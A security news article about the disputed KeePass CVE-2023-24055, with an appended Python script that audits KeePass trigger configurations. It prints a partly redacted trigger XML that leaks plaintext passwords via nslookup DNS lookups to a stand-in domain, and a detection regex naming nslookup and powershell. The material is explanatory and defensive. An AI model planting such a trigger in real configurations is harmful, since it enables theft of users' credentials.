Password Stealing “Vulnerability” Reported in KeePass: Bug or Feature? – Naked Security
It has been a newsworthy few weeks for password managers, those handy utilities that help you create a different password for every website you use and then keep track of them all.
In late 2022, it was LastPass’s turn to be all over the news, when the company finally admitted that a breach it suffered in August 2022 ended with the theft of customer password vaults from the cloud service where they were backed up.
(The passwords themselves weren’t stolen, because the vaults were encrypted and LastPass didn’t have copies of anyone’s “master key” for the files in the backup vault, but it was a closer shave than most people were happy to hear about.)
Then it was LifeLock’s turn to be all over the news, when the company warned of what looked like a wave of password-guessing attacks, probably based on passwords stolen from an entirely different website, possibly some time ago, and perhaps bought on the dark web recently.
LifeLock itself hadn’t been breached, but some of its users had, thanks to password-sharing habits that exposed them to risks they might not even realise they were taking.
Rivals 1Password and Bitwarden have also been in the news recently, following reports of malicious ads, apparently served unwittingly by Google, convincingly luring users to look-alike login pages aimed at stealing their account details.
Now it’s KeePass’s turn to make the news, this time for a different cybersecurity problem: an alleged vulnerability, the jargon term for a software bug that leads to a cybersecurity hole that attackers could exploit for malicious purposes.
Password tracking made easy
We refer to it as a vulnerability here because it has an official bug identifier, issued by the US National Institute of Standards and Technology.
The bug has been dubbed CVE-2023-24055: Attacker having write access to the XML configuration file [can] obtain the cleartext passwords by adding an export trigger.
Unfortunately, the claim of being able to obtain cleartext passwords is true.
If I have write access to your personal files, including those in your %APPDATA% directory, I can sneakily tweak the settings section to modify any KeePass settings you’ve already customised, or to add customisations if you haven’t knowingly changed anything…
…and, surprisingly easily, I can steal your plaintext passwords, either in bulk, e.g. by dumping the entire database as an unencrypted CSV file, or while you are using them, e.g. by setting up a “program hook” that is triggered every time you access a password in the database.
Note that I don’t need Administrator privileges, because I don’t need to mess with the actual installation directory where the KeePass application is stored, which is usually out of reach for ordinary users, and I don’t need access to any locked-down global config settings.
Interestingly, KeePass goes to great lengths to prevent your passwords from being sniffed out while you use them, including using tamper-protection techniques to thwart various keylogging tricks even from users who already have sysadmin powers.
But the KeePass software also makes it surprisingly easy to capture plaintext password data, perhaps in ways you might consider “too easy”, even for non-admins.
It took us a minute’s work to use the KeePass GUI to create a Trigger event that runs whenever you copy a password to the clipboard, and to configure that event to perform a DNS lookup that includes both the username and the plaintext password in question:
We could then copy the not-so-obvious XML configuration for that option from our own local configuration file into another user’s configuration file on the same system, and they, too, would find their passwords leaking out over the internet via DNS lookups.
Although the XML configuration data is largely readable and informative, KeePass apparently uses random data strings called GUIDs (short for globally unique identifiers) to denote the various Trigger configurations, so even a knowledgeable user would need a comprehensive reference list to know which triggers are configured and how.
Here’s what our DNS leak trigger looks like, although we’ve redacted some of the details so you can’t do any immediate harm simply by copying and pasting this text directly:
<Trigger>
  <Guid>XXXXXXXXXXXXXXXXXXXX</Guid>
  <Name>Copy</Name>
  <Comments>Steal stuff via DNS lookups</Comments>
  <Events>
    <Event>
      <TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
      <Parameters>
        <Parameter>0</Parameter>
        <Parameter />
      </Parameters>
    </Event>
  </Events>
  <Conditions />
  <Actions>
    <Action>
      <TypeGuid>XXXXXXXXXXXXXXXXXXXX</TypeGuid>
      <Parameters>
        <Parameter>nslookup</Parameter>
        <Parameter>XXXXX.XXXXX.blah.test</Parameter>
        <Parameter>True</Parameter>
        <Parameter>1</Parameter>
        <Parameter />
      </Parameters>
    </Action>
  </Actions>
</Trigger>
With this trigger active, accessing a KeePass password causes the plaintext to leak out in a discreet DNS lookup to a domain of my choosing, which is blah.test in this example.
Note that real-life attackers would probably scramble or obfuscate the stolen text, which would not only make DNS leak detection harder, but would also deal with passwords containing non-ASCII characters, such as accented letters or emoji, which can’t otherwise be used in DNS names.
But is it really a bug?
The tricky question, however, is, “Is this really a bug, or is it just a powerful feature that could be abused by someone who would already need at least as much control over your private files as you have yourself?”
Simply put, is it a vulnerability if someone already in charge of your account can tamper with the files your account is supposed to be able to access anyway?
Although you might expect a password manager to include many extra layers of tamper protection to make bugs/features of this sort harder to abuse, should CVE-2023-24055 really be a vulnerability in the CVE list?
If so, wouldn’t commands such as DEL (delete a file) and FORMAT need to be “bugs” too?
Wouldn’t the very existence of PowerShell, which makes potentially dangerous behaviour much easier to trigger (try powershell get-clipboard, for example), be a vulnerability in itself?
That’s KeePass’s position, as stated in the following text that was added to the “bug” detail on the NIST website:
** DISPUTED ** […] NOTE: The vendor’s position is that the password database is not designed to be secure against an attacker having that level of access to the local PC.
What to do?
If you’re a standalone KeePass user, you can check for malicious triggers like the “DNS stealer” we created above by opening the KeePass app and examining the Tools > Triggers… window:
Note that you can turn the whole Trigger system off from this window, simply by deselecting the [ ] Enable trigger system option…
…but that’s not a global setting, so it can be re-enabled via your local config file, and thus only protects you from bugs, rather than from an attacker with access to your account.
You can force the option off for everyone on the computer, with no way for them to turn it back on themselves, by modifying the global “lockdown” file KeePass.config.enforced.xml, which lives in the directory where the application program itself is installed.
Triggers will be disabled for everyone if your global XML enforcement file looks like this:
<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Application>
    <TriggerSystem>
      <Enabled>false</Enabled>
    </TriggerSystem>
  </Application>
</Configuration>
(In case you’re wondering, an attacker who has write access to the application directory to revert this change would already have enough system-level power to modify the KeePass application entirely, or to install and activate a standalone keylogger, anyway.)
If you’re a network administrator tasked with locking down KeePass on your users’ computers so that it’s flexible enough to help them, but not flexible enough to help cybercriminals by mistake, we recommend reading KeePass’s security issues page, the triggers page, and the enforced configuration page.
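As an added defender-side example (not code from the article or from the KeePass project), the following Python script parses a KeePass-style configuration, lists every configured trigger with its comments, flags action parameters that name a program, script, export file or hostname (the nslookup trigger shown above would be caught), and checks whether an enforced config turns the trigger system off. The sample XML and the GUID values are constructed placeholders, and the keyword heuristic is an assumption of this example, not KeePass’s own classification of trigger types.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the article's DNS-leak trigger; GUIDs are placeholders.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<Configuration><Application><TriggerSystem><Enabled>true</Enabled><Triggers>
  <Trigger><Guid>AAAAAAAAAAAAAAAAAAAA</Guid><Name>Copy</Name>
    <Comments>Steal stuff via DNS lookups</Comments>
    <Actions><Action><TypeGuid>BBBBBBBBBBBBBBBBBBBB</TypeGuid><Parameters>
      <Parameter>nslookup</Parameter><Parameter>XXXXX.XXXXX.blah.test</Parameter>
      <Parameter>True</Parameter><Parameter>1</Parameter><Parameter /></Parameters>
    </Action></Actions></Trigger>
  <Trigger><Guid>CCCCCCCCCCCCCCCCCCCC</Guid><Name>Harmless</Name>
    <Actions><Action><TypeGuid>DDDDDDDDDDDDDDDDDDDD</TypeGuid><Parameters>
      <Parameter>Show a message</Parameter></Parameters></Action></Actions></Trigger>
</Triggers></TriggerSystem></Application></Configuration>"""

# Constructed copy of the enforced-config fragment shown in the article.
ENFORCED_OFF = """<?xml version="1.0" encoding="utf-8"?>
<Configuration><Application><TriggerSystem><Enabled>false</Enabled>
</TriggerSystem></Application></Configuration>"""

# Heuristic only (an assumption of this example): a parameter naming a program, script,
# export file or hostname is worth a human look. KeePass identifies action types by
# TypeGuid, so a thorough audit would also map each TypeGuid against the vendor's list.
SUSPICIOUS = re.compile(
    r"(nslookup|powershell|cmd\.exe|\.exe\b|\.ps1\b|\.bat\b|\.csv\b|https?://"
    r"|\b[\w-]+(?:\.[\w-]+){2,}\b)", re.I)

def audit_triggers(xml_text):
    """Return (name, comments, [suspicious parameter values]) for every <Trigger>."""
    root = ET.fromstring(xml_text)
    out = []
    for trig in root.iter("Trigger"):
        hits = [p.text for p in trig.iter("Parameter")
                if p.text and SUSPICIOUS.search(p.text)]
        out.append((trig.findtext("Name", ""), trig.findtext("Comments", ""), hits))
    return out

def trigger_system_enabled(xml_text):
    """True unless Application/TriggerSystem/Enabled is explicitly 'false'."""
    root = ET.fromstring(xml_text)
    val = root.findtext("Application/TriggerSystem/Enabled", "true")
    return val.strip().lower() != "false"

if __name__ == "__main__":
    for name, comments, hits in audit_triggers(SAMPLE_CONFIG):
        print(f"trigger {name!r} ({comments!r}): flagged {hits}")
    print("trigger system enforced off:", not trigger_system_enabled(ENFORCED_OFF))
```

To audit a real installation, read the user’s KeePass.config.xml and the global KeePass.config.enforced.xml into the two functions instead of the constructed strings.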